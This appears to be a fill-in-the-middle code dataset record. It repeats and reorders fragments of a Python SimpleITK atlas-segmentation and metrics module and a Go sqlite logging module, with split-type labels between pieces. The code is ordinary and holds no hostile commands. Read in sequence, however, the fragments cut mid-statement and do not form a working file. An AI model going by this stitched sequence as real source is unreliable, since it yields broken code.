# 2. Dice coef.
# 3. Hausdorff distance
# --------------------------- #
# --- Input --- #
# mask_img : The mask image [sitk-image]
# seg_img: The segmented image [sitk-image]
# --- Output --- #
# None
def distances(mask_img, seg_img):
# Creating the necessary filters
hausdorff = sitk.HausdorffDistanceImageFilter()
overlap = sitk.LabelOverlapMeasuresImageFilter()
# Execute filters
hausdorff.Execute(mask_img, seg_img)
overlap.Execute(mask_img, seg_img)
# Fetching the distances and appending to distance list
# Jaccard coef.
jaccard = overlap.GetJaccardCoefficient()
# Dice coef.
dice = overlap.GetDiceCoefficient()
# Hausdorff distance
hausdorff_distance = hausdorff.GetHausdorffDistance()
# Printing out the distances for user
print('The Hausdorff distance: {}'.format(
hausdorff_distance))
print('The Dice coefficient: {}'.format(dice))
print('The Jaccard coefficient: {}'.format(jaccard))
return None
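# Example call (variable names are hypothetical): distances(ground_truth_mask, seg_img)
# prints the three metrics; both arguments are expected to be binary sitk images
# defined on the same grid.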
# # Classifier Function # #
# --------------------------- #
# Trains a random forest classifier on 2D slice images, using label vectors
# whose binary entries indicate whether each slice contains the pubic
# symphysis.
# --------------------------- #
# --- Input --- #
# slice_list : List of 2D slice images [list]
# vector_list : List of vectors with binary labels [list]
# --- Output --- #
# trained_forest : Trained random forest classifier [sklearn.ensemble.forest.RandomForestClassifier]
def train_classifier(slice_list, vector_list):
# Creating necessary list
x_train_list = []
# Reading in input data
for image in slice_list:
# Fetching arrays
image_array = sitk.GetArrayFromImage(image)
# Resizing
image_array.resize((512, 512, 512))
for z in range(image_array.shape[2]):
x_train_list.append(image_array[:, :, z].flatten())
x_train = np.asarray(x_train_list, dtype=np.uint8)
# Reading in training labels
y_train = None
for i in range(0, len(vector_list)):
if i == 0:
y_train = vector_list[i]
else:
y_train = np.concatenate([y_train, vector_list[i]])
# Train classifier
trained_forest = RandomForestClassifier(n_estimators=150)
|
apply_transf
|
identifier_name
|
functions.py
|
Initializer(im_ref, im_mov, sitk.ScaleSkewVersor3DTransform(),
sitk.CenteredTransformInitializerFilter.MOMENTS)
# Initialize registration
lin_transformation = sitk.ImageRegistrationMethod()
# Set metrics
lin_transformation.SetMetricAsMeanSquares()
lin_transformation.SetMetricSamplingStrategy(lin_transformation.RANDOM)
lin_transformation.SetMetricSamplingPercentage(0.01)
# Set mask
if mov_mask:
lin_transformation.SetMetricMovingMask(mov_mask)
# Gradient Descent optimizer
lin_transformation.SetOptimizerAsGradientDescent(learningRate=1, numberOfIterations=400,
convergenceMinimumValue=1e-6, convergenceWindowSize=10)
lin_transformation.SetOptimizerScalesFromPhysicalShift()
# Set the initial transformation
lin_transformation.SetInitialTransform(initial_transform)
# Switching to preferred variable
lin_xfm = lin_transformation
if show_parameters:
print(lin_xfm)
return lin_xfm
# # Estimation function # #
# --------------------------- #
# Non-linear 'Demons' registration function
# --------------------------- #
# --- Input --- #
# im_ref : The common (fixed) image [sitk.Image]
# fixed_mask : The mask of the common image, default is None [sitk.Image]
# show_parameters : If you want to see the parameters, false by default [boolean]
# --- Output --- #
# nl_xfm : The configured 'Demons' registration method [sitk.ImageRegistrationMethod]
def est_nl_transf(im_ref, fixed_mask=None, show_parameters=False):
# Initialize the registration
reg_method = sitk.ImageRegistrationMethod()
# Create initial identity transformation.
transform_to_displacement_field_filter = sitk.TransformToDisplacementFieldFilter()
transform_to_displacement_field_filter.SetReferenceImage(im_ref)
initial_transform = sitk.DisplacementFieldTransform(
transform_to_displacement_field_filter.Execute(sitk.Transform()))
# Regularization. The update field refers to fluid regularization; the total field to elastic regularization.
initial_transform.SetSmoothingGaussianOnUpdate(varianceForUpdateField=0, varianceForTotalField=1.5)
# Set the initial transformation
reg_method.SetInitialTransform(initial_transform)
# Set Demons registration
reg_method.SetMetricAsDemons(intensityDifferenceThreshold=0.001)
# Evaluate the metrics only in the mask
if fixed_mask is not None:
reg_method.SetMetricFixedMask(fixed_mask)
# Set a linear interpolator
reg_method.SetInterpolator(sitk.sitkLinear)
# Set a gradient descent optimizer
reg_method.SetOptimizerAsGradientDescent(learningRate=1.0, numberOfIterations=10, convergenceMinimumValue=1e-6,
convergenceWindowSize=10)
reg_method.SetOptimizerScalesFromPhysicalShift()
# Switching to the preferred variable
nl_xfm = reg_method
if show_parameters:
print(nl_xfm)
return nl_xfm
# # Application function # #
# --------------------------- #
# Executes either the linear or the non-linear function
# --------------------------- #
# --- Input --- #
# im_ref : The common (fixed) image [sitk.Image]
# im_mov : The group (moving) image [sitk.Image]
# trafo : The configured registration method [sitk.ImageRegistrationMethod]
# show_parameters : If you want to see the parameters, false by default [boolean]
# --- Output --- #
# transf : The estimated transformation [sitk.Transform]
def apply_transf(im_ref, im_mov, trafo, show_parameters=False):
# Perform registration (Executes it)
transf = trafo.Execute(sitk.Cast(im_ref, sitk.sitkFloat32), sitk.Cast(im_mov, sitk.sitkFloat32))
if show_parameters:
print(transf)
print("--------")
print("Optimizer stop condition: {0}".format(trafo.GetOptimizerStopConditionDescription()))
print("Number of iterations: {0}".format(trafo.GetOptimizerIteration()))
print("--------")
return transf
# # Atlas segmentation function # #
# --------------------------- #
# Atlas-based segmentation using the CT images in 'ct_list'
# and corresponding segmentation masks from 'seg_list'.
# After that, majority voting to return a segmentation mask.
# --------------------------- #
# --- Input --- #
# common_img : The chosen COMMON image [sitk-image]
# ct_list : List of GROUP images [list]
# seg_list : List of GROUP masks [list]
# --- Output --- #
# segmented_array : The segmentation as an array [numpy.ndarray]
def seg_atlas(common_img, ct_list, seg_list):
# Creating the necessary lists
seg = []
image_list = []
# # REGISTRATION # #
for i in range(len(ct_list)):
# Adjusting the settings and applying
trafo_settings = est_lin_transf(common_img, ct_list[i], mov_mask=seg_list[i], show_parameters=False)
final_trafo = apply_transf(common_img, ct_list[i], trafo_settings)
# Perform registration on mask image
resampler = sitk.ResampleImageFilter()
resampler.SetReferenceImage(common_img)
resampler.SetInterpolator(sitk.sitkLinear)
resampler.SetTransform(final_trafo)
resampled_mask = resampler.Execute(seg_list[i])
resampled_mask_data = sitk.GetArrayFromImage(resampled_mask)
seg.append(resampled_mask_data)
# # MAJORITY VOTING # #
for i in range(len(seg)):
|
# Creating a list which contains the indexes of intersecting voxels
intersection_list = list(set(image_list[0]) | set(image_list[1]) | set(image_list[2]))
# Sorting the list
intersection_list.sort()
# Fetches array from image
image_array = sitk.GetArrayFromImage(common_img)
# Creates an array for the points and fills it using indexes
segmented_array = np.zeros(shape=image_array.shape, dtype=np.uint8)
for x, y, z in intersection_list:
segmented_array[x, y, z] = 1
return segmented_array
# # Similarity function # #
# --------------------------- #
# Calculates the following distances between images:
# 1. Jaccard coef.
# 2. Dice coef.
# 3. Hausdorff distance
# --------------------------- #
# --- Input --- #
# mask_img : The mask image [sitk-image]
# seg_img: The segmented image [sitk-image]
# --- Output --- #
# None
def distances(mask_img, seg_img):
# Creating the necessary filters
hausdorff = sitk.HausdorffDistanceImageFilter()
overlap = sitk.LabelOverlapMeasuresImageFilter()
# Execute filters
hausdorff.Execute(mask_img, seg_img)
overlap.Execute(mask_img, seg_img)
# Fetching the distances and appending to distance list
# Jaccard coef.
jaccard = overlap.GetJaccardCoefficient()
# Dice coef.
dice = overlap.GetDiceCoefficient()
# Hausdorff distance
hausdorff_distance = hausdorff.GetHausdorffDistance()
# Printing out the distances for user
print('The Hausdorff distance: {}'.format(
hausdorff_distance))
print('The Dice coefficient: {}'.format(dice))
print('The Jaccard coefficient: {}'.format(jaccard))
return None
# # Classifier Function # #
# --------------------------- #
# Trains a random forest classifier on 2D slice images, using label vectors
# whose binary entries indicate whether each slice contains the pubic
# symphysis.
# --------------------------- #
# --- Input --- #
# slice_list : List of 2D slice images [list]
# vector_list : List of vectors with binary labels [list]
# --- Output --- #
# trained_forest : Trained random forest classifier [sklearn.ensemble.forest.RandomForestClassifier]
def train_classifier(slice_list, vector_list):
# Creating necessary list
x_train_list = []
# Reading in input data
for image in slice_list:
# Fetching arrays
image_array = sitk.GetArrayFromImage(image)
# Resizing
image_array.resize((512, 512, 512))
for z in range(image_array.shape[2]):
x_train_list.append(image_array[:, :, z].flatten())
x_train = np.asarray(x_train_list, dtype=np.uint8)
# Reading in training labels
y_train = None
for i in range(0, len(vector_list)):
if i == 0:
y_train = vector_list[i]
else:
y_train = np.concatenate([y_train, vector_list[i]])
# Train classifier
trained_forest = RandomForestClassifier(n_estimators=150)
|
for j in range(i + 1, len(seg)):
arr1 = np.transpose(np.nonzero(seg[i]))
arr2 = np.transpose(np.nonzero(seg[j]))
# Filling two lists
arr1list = [tuple(e) for e in arr1.tolist()]
arr2list = [tuple(e) for e in arr2.tolist()]
# Sorting both lists
arr1list.sort()
arr2list.sort()
# Creating necessary list & sorting
intersections = list(set(arr1list).intersection(arr2list))
intersections.sort()
image_list.append(intersections)
|
conditional_block
|
functions.py
|
Initializer(im_ref, im_mov, sitk.ScaleSkewVersor3DTransform(),
sitk.CenteredTransformInitializerFilter.MOMENTS)
# Initialize registration
lin_transformation = sitk.ImageRegistrationMethod()
# Set metrics
lin_transformation.SetMetricAsMeanSquares()
lin_transformation.SetMetricSamplingStrategy(lin_transformation.RANDOM)
lin_transformation.SetMetricSamplingPercentage(0.01)
# Set mask
if mov_mask:
lin_transformation.SetMetricMovingMask(mov_mask)
# Gradient Descent optimizer
lin_transformation.SetOptimizerAsGradientDescent(learningRate=1, numberOfIterations=400,
convergenceMinimumValue=1e-6, convergenceWindowSize=10)
lin_transformation.SetOptimizerScalesFromPhysicalShift()
# Set the initial transformation
lin_transformation.SetInitialTransform(initial_transform)
# Switching to preferred variable
lin_xfm = lin_transformation
if show_parameters:
print(lin_xfm)
return lin_xfm
# # Estimation function # #
# --------------------------- #
# Non-linear 'Demons' registration function
# --------------------------- #
# --- Input --- #
# im_ref : The common (fixed) image [sitk.Image]
# fixed_mask : The mask of the common image, default is None [sitk.Image]
# show_parameters : If you want to see the parameters, false by default [boolean]
# --- Output --- #
# nl_xfm : The configured 'Demons' registration method [sitk.ImageRegistrationMethod]
def est_nl_transf(im_ref, fixed_mask=None, show_parameters=False):
# Initialize the registration
reg_method = sitk.ImageRegistrationMethod()
# Create initial identity transformation.
transform_to_displacement_field_filter = sitk.TransformToDisplacementFieldFilter()
transform_to_displacement_field_filter.SetReferenceImage(im_ref)
initial_transform = sitk.DisplacementFieldTransform(
transform_to_displacement_field_filter.Execute(sitk.Transform()))
# Regularization. The update field refers to fluid regularization; the total field to elastic regularization.
initial_transform.SetSmoothingGaussianOnUpdate(varianceForUpdateField=0, varianceForTotalField=1.5)
# Set the initial transformation
reg_method.SetInitialTransform(initial_transform)
# Set Demons registration
reg_method.SetMetricAsDemons(intensityDifferenceThreshold=0.001)
# Evaluate the metrics only in the mask
if fixed_mask is not None:
reg_method.SetMetricFixedMask(fixed_mask)
# Set a linear interpolator
reg_method.SetInterpolator(sitk.sitkLinear)
# Set a gradient descent optimizer
reg_method.SetOptimizerAsGradientDescent(learningRate=1.0, numberOfIterations=10, convergenceMinimumValue=1e-6,
convergenceWindowSize=10)
reg_method.SetOptimizerScalesFromPhysicalShift()
# Switching to the preferred variable
nl_xfm = reg_method
if show_parameters:
print(nl_xfm)
return nl_xfm
# # Application function # #
# --------------------------- #
# Executes either the linear or the non-linear function
# --------------------------- #
# --- Input --- #
# im_ref : The common (fixed) image [sitk.Image]
# im_mov : The group (moving) image [sitk.Image]
# trafo : The configured registration method [sitk.ImageRegistrationMethod]
# show_parameters : If you want to see the parameters, false by default [boolean]
# --- Output --- #
# transf : The estimated transformation [sitk.Transform]
def apply_transf(im_ref, im_mov, trafo, show_parameters=False):
# Perform registration (Executes it)
transf = trafo.Execute(sitk.Cast(im_ref, sitk.sitkFloat32), sitk.Cast(im_mov, sitk.sitkFloat32))
if show_parameters:
print(transf)
print("--------")
print("Optimizer stop condition: {0}".format(trafo.GetOptimizerStopConditionDescription()))
print("Number of iterations: {0}".format(trafo.GetOptimizerIteration()))
print("--------")
return transf
# # Atlas segmentation function # #
# --------------------------- #
# Atlas-based segmentation using the CT images in 'ct_list'
# and corresponding segmentation masks from 'seg_list'.
# After that, majority voting to return a segmentation mask.
# --------------------------- #
# --- Input --- #
# common_img : The chosen COMMON image [sitk-image]
# ct_list : List of GROUP images [list]
# seg_list : List of GROUP masks [list]
# --- Output --- #
# segmented_array : The segmentation as an array [numpy.ndarray]
def seg_atlas(common_img, ct_list, seg_list):
# Creating the necessary lists
|
# # MAJORITY VOTING # #
for i in range(len(seg)):
for j in range(i + 1, len(seg)):
arr1 = np.transpose(np.nonzero(seg[i]))
arr2 = np.transpose(np.nonzero(seg[j]))
# Filling two lists
arr1list = [tuple(e) for e in arr1.tolist()]
arr2list = [tuple(e) for e in arr2.tolist()]
# Sorting both lists
arr1list.sort()
arr2list.sort()
# Creating necessary list & sorting
intersections = list(set(arr1list).intersection(arr2list))
intersections.sort()
image_list.append(intersections)
# Creating a list which contains the indexes of intersecting voxels
intersection_list = list(set(image_list[0]) | set(image_list[1]) | set(image_list[2]))
# Sorting the list
intersection_list.sort()
# Fetches array from image
image_array = sitk.GetArrayFromImage(common_img)
# Creates an array for the points and fills it using indexes
segmented_array = np.zeros(shape=image_array.shape, dtype=np.uint8)
for x, y, z in intersection_list:
segmented_array[x, y, z] = 1
return segmented_array
# # Similarity function # #
# --------------------------- #
# Calculates the following distances between images:
# 1. Jaccard coef.
# 2. Dice coef.
# 3. Hausdorff distance
# --------------------------- #
# --- Input --- #
# mask_img : The mask image [sitk-image]
# seg_img: The segmented image [sitk-image]
# --- Output --- #
# None
def distances(mask_img, seg_img):
# Creating the necessary filters
hausdorff = sitk.HausdorffDistanceImageFilter()
overlap = sitk.LabelOverlapMeasuresImageFilter()
# Execute filters
hausdorff.Execute(mask_img, seg_img)
overlap.Execute(mask_img, seg_img)
# Fetching the distances and appending to distance list
# Jaccard coef.
jaccard = overlap.GetJaccardCoefficient()
# Dice coef.
dice = overlap.GetDiceCoefficient()
# Hausdorff distance
hausdorff_distance = hausdorff.GetHausdorffDistance()
# Printing out the distances for user
print('The Hausdorff distance: {}'.format(
hausdorff_distance))
print('The Dice coefficient: {}'.format(dice))
print('The Jaccard coefficient: {}'.format(jaccard))
return None
# # Classifier Function # #
# --------------------------- #
# Trains a random forest classifier on 2D slice images, using label vectors
# whose binary entries indicate whether each slice contains the pubic
# symphysis.
# --------------------------- #
# --- Input --- #
# slice_list : List of 2D slice images [list]
# vector_list : List of vectors with binary labels [list]
# --- Output --- #
# trained_forest : Trained random forest classifier [sklearn.ensemble.forest.RandomForestClassifier]
def train_classifier(slice_list, vector_list):
# Creating necessary list
x_train_list = []
# Reading in input data
for image in slice_list:
# Fetching arrays
image_array = sitk.GetArrayFromImage(image)
# Resizing
image_array.resize((512, 512, 512))
for z in range(image_array.shape[2]):
x_train_list.append(image_array[:, :, z].flatten())
x_train = np.asarray(x_train_list, dtype=np.uint8)
# Reading in training labels
y_train = None
for i in range(0, len(vector_list)):
if i == 0:
y_train = vector_list[i]
else:
y_train = np.concatenate([y_train, vector_list[i]])
# Train classifier
trained_forest = RandomForestClassifier(n_estimators=150
|
seg = []
image_list = []
# # REGISTRATION # #
for i in range(len(ct_list)):
# Adjusting the settings and applying
trafo_settings = est_lin_transf(common_img, ct_list[i], mov_mask=seg_list[i], show_parameters=False)
final_trafo = apply_transf(common_img, ct_list[i], trafo_settings)
# Perform registration on mask image
resampler = sitk.ResampleImageFilter()
resampler.SetReferenceImage(common_img)
resampler.SetInterpolator(sitk.sitkLinear)
resampler.SetTransform(final_trafo)
resampled_mask = resampler.Execute(seg_list[i])
resampled_mask_data = sitk.GetArrayFromImage(resampled_mask)
seg.append(resampled_mask_data)
|
identifier_body
|
functions.py
|
Initializer(im_ref, im_mov, sitk.ScaleSkewVersor3DTransform(),
sitk.CenteredTransformInitializerFilter.MOMENTS)
# Initialize registration
lin_transformation = sitk.ImageRegistrationMethod()
# Set metrics
lin_transformation.SetMetricAsMeanSquares()
lin_transformation.SetMetricSamplingStrategy(lin_transformation.RANDOM)
lin_transformation.SetMetricSamplingPercentage(0.01)
# Set mask
if mov_mask:
lin_transformation.SetMetricMovingMask(mov_mask)
# Gradient Descent optimizer
lin_transformation.SetOptimizerAsGradientDescent(learningRate=1, numberOfIterations=400,
convergenceMinimumValue=1e-6, convergenceWindowSize=10)
lin_transformation.SetOptimizerScalesFromPhysicalShift()
# Set the initial transformation
lin_transformation.SetInitialTransform(initial_transform)
# Switching to preferred variable
lin_xfm = lin_transformation
if show_parameters:
print(lin_xfm)
return lin_xfm
# # Estimation function # #
# --------------------------- #
# Non-linear 'Demons' registration function
# --------------------------- #
# --- Input --- #
# im_ref : The common (fixed) image [sitk.Image]
# fixed_mask : The mask of the common image, default is None [sitk.Image]
# show_parameters : If you want to see the parameters, false by default [boolean]
# --- Output --- #
# nl_xfm : The configured 'Demons' registration method [sitk.ImageRegistrationMethod]
def est_nl_transf(im_ref, fixed_mask=None, show_parameters=False):
# Initialize the registration
reg_method = sitk.ImageRegistrationMethod()
# Create initial identity transformation.
transform_to_displacement_field_filter = sitk.TransformToDisplacementFieldFilter()
transform_to_displacement_field_filter.SetReferenceImage(im_ref)
initial_transform = sitk.DisplacementFieldTransform(
transform_to_displacement_field_filter.Execute(sitk.Transform()))
# Regularization. The update field refers to fluid regularization; the total field to elastic regularization.
initial_transform.SetSmoothingGaussianOnUpdate(varianceForUpdateField=0, varianceForTotalField=1.5)
# Set the initial transformation
reg_method.SetInitialTransform(initial_transform)
# Set Demons registration
reg_method.SetMetricAsDemons(intensityDifferenceThreshold=0.001)
# Evaluate the metrics only in the mask
if fixed_mask is not None:
reg_method.SetMetricFixedMask(fixed_mask)
# Set a linear interpolator
reg_method.SetInterpolator(sitk.sitkLinear)
# Set a gradient descent optimizer
reg_method.SetOptimizerAsGradientDescent(learningRate=1.0, numberOfIterations=10, convergenceMinimumValue=1e-6,
convergenceWindowSize=10)
reg_method.SetOptimizerScalesFromPhysicalShift()
# Switching to the preferred variable
nl_xfm = reg_method
if show_parameters:
print(nl_xfm)
return nl_xfm
# # Application function # #
# --------------------------- #
# Executes either the linear or the non-linear function
# --------------------------- #
# --- Input --- #
# im_ref : The common (fixed) image [sitk.Image]
# im_mov : The group (moving) image [sitk.Image]
# trafo : The configured registration method [sitk.ImageRegistrationMethod]
# show_parameters : If you want to see the parameters, false by default [boolean]
# --- Output --- #
# transf : The estimated transformation [sitk.Transform]
def apply_transf(im_ref, im_mov, trafo, show_parameters=False):
# Perform registration (Executes it)
transf = trafo.Execute(sitk.Cast(im_ref, sitk.sitkFloat32), sitk.Cast(im_mov, sitk.sitkFloat32))
if show_parameters:
print(transf)
print("--------")
print("Optimizer stop condition: {0}".format(trafo.GetOptimizerStopConditionDescription()))
print("Number of iterations: {0}".format(trafo.GetOptimizerIteration()))
print("--------")
return transf
# # Atlas segmentation function # #
# --------------------------- #
# Atlas-based segmentation using the CT images in 'ct_list'
# and corresponding segmentation masks from 'seg_list'.
# After that, majority voting to return a segmentation mask.
# --------------------------- #
# --- Input --- #
# common_img : The chosen COMMON image [sitk-image]
# ct_list : List of GROUP images [list]
# seg_list : List of GROUP masks [list]
# --- Output --- #
# segmented_array : The segmentation as an array [numpy.ndarray]
def seg_atlas(common_img, ct_list, seg_list):
# Creating the necessary lists
seg = []
image_list = []
# # REGISTRATION # #
for i in range(len(ct_list)):
# Adjusting the settings and applying
trafo_settings = est_lin_transf(common_img, ct_list[i], mov_mask=seg_list[i], show_parameters=False)
final_trafo = apply_transf(common_img, ct_list[i], trafo_settings)
# Perform registration on mask image
resampler = sitk.ResampleImageFilter()
resampler.SetReferenceImage(common_img)
resampler.SetInterpolator(sitk.sitkLinear)
resampler.SetTransform(final_trafo)
resampled_mask = resampler.Execute(seg_list[i])
resampled_mask_data = sitk.GetArrayFromImage(resampled_mask)
seg.append(resampled_mask_data)
# # MAJORITY VOTING # #
for i in range(len(seg)):
for j in range(i + 1, len(seg)):
arr1 = np.transpose(np.nonzero(seg[i]))
arr2 = np.transpose(np.nonzero(seg[j]))
# Filling two lists
arr1list = [tuple(e) for e in arr1.tolist()]
arr2list = [tuple(e) for e in arr2.tolist()]
# Sorting both lists
arr1list.sort()
arr2list.sort()
# Creating necessary list & sorting
intersections = list(set(arr1list).intersection(arr2list))
intersections.sort()
image_list.append(intersections)
# Creating a list which contains the indexes of intersecting voxels
intersection_list = list(set(image_list[0]) | set(image_list[1]) | set(image_list[2]))
# Sorting the list
intersection_list.sort()
# Fetches array from image
image_array = sitk.GetArrayFromImage(common_img)
# Creates an array for the points and fills it using indexes
segmented_array = np.zeros(shape=image_array.shape, dtype=np.uint8)
for x, y, z in intersection_list:
segmented_array[x, y, z] = 1
return segmented_array
# # Similarity function # #
# --------------------------- #
# Calculates the following distances between images:
# 1. Jaccard coef.
# 2. Dice coef.
# 3. Hausdorff distance
# --------------------------- #
# --- Input --- #
# mask_img : The mask image [sitk-image]
# seg_img: The segmented image [sitk-image]
# --- Output --- #
# None
def distances(mask_img, seg_img):
# Creating the necessary filters
hausdorff = sitk.HausdorffDistanceImageFilter()
overlap = sitk.LabelOverlapMeasuresImageFilter()
|
# Fetching the distances and appending to distance list
# Jaccard coef.
jaccard = overlap.GetJaccardCoefficient()
# Dice coef.
dice = overlap.GetDiceCoefficient()
# Hausdorff distance
hausdorff_distance = hausdorff.GetHausdorffDistance()
# Printing out the distances for user
print('The Hausdorff distance: {}'.format(
hausdorff_distance))
print('The Dice coefficient: {}'.format(dice))
print('The Jaccard coefficient: {}'.format(jaccard))
return None
# # Classifier Function # #
# --------------------------- #
# Trains a random forest classifier on 2D slice images, using label vectors
# whose binary entries indicate whether each slice contains the pubic
# symphysis.
# --------------------------- #
# --- Input --- #
# slice_list : List of 2D slice images [list]
# vector_list : List of vectors with binary labels [list]
# --- Output --- #
# trained_forest : Trained random forest classifier [sklearn.ensemble.forest.RandomForestClassifier]
def train_classifier(slice_list, vector_list):
# Creating necessary list
x_train_list = []
# Reading in input data
for image in slice_list:
# Fetching arrays
image_array = sitk.GetArrayFromImage(image)
# Resizing
image_array.resize((512, 512, 512))
for z in range(image_array.shape[2]):
x_train_list.append(image_array[:, :, z].flatten())
x_train = np.asarray(x_train_list, dtype=np.uint8)
# Reading in training labels
y_train = None
for i in range(0, len(vector_list)):
if i == 0:
y_train = vector_list[i]
else:
y_train = np.concatenate([y_train, vector_list[i]])
# Train classifier
trained_forest = RandomForestClassifier(n_estimators=15
|
# Execute filters
hausdorff.Execute(mask_img, seg_img)
overlap.Execute(mask_img, seg_img)
|
random_line_split
|
sqlite.go
|
// Ensure every transaction returns its connection via Commit() or Rollback()
// Note that Rows.Close() can be called multiple times safely,
// so do not fear calling it where it might not be necessary.
const (
backupDB = iota
rotateDB
)
const (
	// create a dedicated directory for the sqlite db file, since sqlite also syncs the containing directory
backupDir = "sqlitedb"
rotateDir = "sqlitedb_rotate"
dbDSN = "file:%s?cache=%s&_journal=%s&_sync=OFF"
)
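// For illustration (the real value is assembled in initDB below): with the backup
// directory, cache=shared and journal=wal, dbDSN expands to something like
// "file:sqlitedb/name_uuid.db?cache=shared&_journal=wal&_sync=OFF".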
var journalMode = map[int]string{
DELETE: "delete",
TRUNCATE: "truncate",
PERSIST: "persist",
MEMORY: "memory",
WAL: "wal",
OFF: "off",
}
var cacheMode = map[int]string{
SHARED: "shared",
PRIVATE: "private",
}
var (
insertActorStart = `INSERT INTO actor(uuid, name, start_time) VALUES (:uuid, :name, :start_time) ;`
updateActorEnd = `UPDATE actor SET end_time = :end_time WHERE uuid = :uuid ;`
insertLog = `INSERT INTO log(time, message) VALUES (:time, :message) ;`
)
var (
ErrDbPathIsAFile = "%s is an existing file"
ErrDbClosed = errors.New("DB is closed")
)
var actor_schema = `
CREATE TABLE if not exists actor(
uuid text PRIMARY KEY,
name text,
start_time text,
end_time text
);
`
var log_schema = `
CREATE TABLE if not exists log(
seq INTEGER PRIMARY KEY ASC,
time text,
message text
);
`
// database ORM types
type (
message struct {
Msg string `json:"message"`
}
actor struct {
Uuid string `db:"uuid"`
Name string `db:"name"`
Stime string `db:"start_time"`
Etime string `db:"end_time"`
}
log struct {
Seq int `db:"seq"`
Time string `db:"time"`
Msg []byte `db:"message"`
}
)
// NewSqlite returns an initialized Sqlite instance
//
// ctx: context.Context
//
// name: actor name
//
// uuid: actor uuid
//
// jmode: journal mode
//
// cmode: cache mode
//
// rcnt: 0: no rotation, >0: preserve number of records then rotate.
func NewSqlite(
ctx context.Context, // caller's context
name string, // actor name
uuid string, // actor uuid
jmode int, // journal mode
cmode int, // cache mode
rcnt int, // rotate count
period int, // recycle period in seconds
) (*Sqlite, error) {
db, err := initDB(ctx, name, uuid, jmode, cmode, backupDB)
if err != nil {
l.Logger.Error(
"backup initDB error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
return nil, err
}
if rcnt > 0 {
go rotate(ctx, name, uuid, db, rcnt, period)
}
return &Sqlite{
ctx: ctx,
name: name,
uuid: uuid,
journal: jmode,
cache: cmode,
rotate: rcnt,
db: db,
}, nil
}
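// Minimal usage sketch (not part of the original file): the actor name, uuid and
// rotation settings are illustrative; it only calls NewSqlite with the journal and
// cache constants already referenced by the journalMode and cacheMode maps above.
func exampleNewSqlite(ctx context.Context) (*Sqlite, error) {
	// WAL journal, shared cache, keep roughly 1000 log rows per file, check every 60s.
	return NewSqlite(ctx, "demo-actor", "00000000-0000-0000-0000-000000000000", WAL, SHARED, 1000, 60)
}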
func initDB(
ctx context.Context,
name, uuid string,
jmode, cmode int,
dbType int) (*sqlx.DB, error) {
var dbPath string
currentDir, _ := os.Getwd()
switch dbType {
case backupDB:
dbPath = path.Join(currentDir, backupDir)
case rotateDB:
dbPath = path.Join(currentDir, rotateDir)
default:
dbPath = path.Join(currentDir, backupDir)
}
if fi, err := os.Stat(dbPath); err != nil {
if err := os.Mkdir(dbPath, 0700); err != nil {
return nil, err
}
} else if !fi.IsDir() {
// dbPath is a file, not directory
return nil, fmt.Errorf(ErrDbPathIsAFile, dbPath)
}
var dbFile string
gpattern := `%s_%s_*.db`
rpattern := `%s_%s_(?P<SEQ>\d+).db`
switch dbType {
case backupDB:
dbFile = path.Join(dbPath, fmt.Sprintf("%s_%s.db", name, uuid))
case rotateDB:
dbFiles := path.Join(dbPath, fmt.Sprintf(gpattern, name, uuid))
if m, err := filepath.Glob(dbFiles); err != nil {
dbFile = path.Join(dbPath, fmt.Sprintf("%s_%s_1.db", name, uuid))
} else {
re, err := regexp.Compile(fmt.Sprintf(rpattern, name, uuid))
if err != nil {
return nil, err
}
maxCnt := 0
for idx := range m {
match := re.FindStringSubmatch(m[idx])
for i, name := range re.SubexpNames() {
if i != 0 && name == "SEQ" {
v, _ := strconv.Atoi(match[i])
maxCnt = max(v, maxCnt)
}
}
}
dbFile = path.Join(
dbPath, fmt.Sprintf("%s_%s_%d.db", name, uuid, maxCnt+1))
}
default:
dbFile = path.Join(dbPath, fmt.Sprintf("%s_%s.db", name, uuid))
}
dsn := fmt.Sprintf(dbDSN, dbFile, cacheMode[cmode], journalMode[jmode])
// Use open instead of MustOpen, which panics if can't open
// Use open instead of Connect since sqlite is local file
db, err := sqlx.Open(
"sqlite3",
dsn,
)
if err != nil {
return nil, err
}
// The connection is returned to the pool before every call's result
// is returned.
db.SetMaxOpenConns(1)
db.SetMaxIdleConns(1)
	// sqlite Exec can't handle multiple statements, so each schema is executed as a separate statement
db.MustExecContext(ctx, actor_schema)
db.MustExecContext(ctx, log_schema)
return db, nil
}
func max(x, y int) int {
if x < y {
return y
}
return x
}
func rotate(
ctx context.Context,
name, uuid string,
db *sqlx.DB,
rcnt, period int) {
c := time.Tick(time.Duration(period) * time.Second)
if c == nil {
l.Logger.Error(
"rotate error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", fmt.Sprintf(
"rotate period is invalid: %d", period)),
)
return
}
rating := make(chan struct{}, 1)
selectSql := `SELECT seq, time, message FROM log ORDER BY seq LIMIT ? ;`
deleteSql := `DELETE FROM log WHERE seq <= ? ;`
selectCnt := `SELECT COUNT(*) FROM log ;`
runner := func() {
defer func() {
<-rating
}()
var rowCnt int
tx, err := db.BeginTxx(ctx, nil)
if err != nil {
l.Logger.Error(
"backup db transaction error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
return
}
cntRow := tx.QueryRowxContext(ctx, selectCnt)
cntRow.Scan(&rowCnt)
if rowCnt > rcnt {
rdb, err := initDB(ctx, name, uuid, DELETE, PRIVATE, rotateDB)
if err != nil {
l.Logger.Error(
"rotate initDB error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
tx.Rollback()
return
}
defer rdb.Close()
rows, err := tx.QueryxContext(ctx, selectSql, rcnt)
if err != nil {
l.Logger.Error(
"backup db query error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.Int("row count", rcnt),
zap.String("error", err.Error()),
)
tx.Rollback()
return
}
defer rows.Close()
lastSeq := 0
for rows.Next() {
var ll log
if err := rows.StructScan(&ll); err != nil {
l.Logger.Error(
"backup db StructScan error",
zap.String("service", serviceName),
zap.String("actor", name),
zap.String("uuid", uuid),
zap.String("error", err.Error()),
)
|
// To prevent this:
// Ensure you Scan() every Row object
// Ensure you either Close() or fully-iterate via Next() every Rows object
|
random_line_split
|
|
sqlite.go
|
message) ;`
)
var (
ErrDbPathIsAFile = "%s is an existing file"
ErrDbClosed = errors.New("DB is closed")
)
var actor_schema = `
CREATE TABLE if not exists actor(
uuid text PRIMARY KEY,
name text,
start_time text,
end_time text
);
`
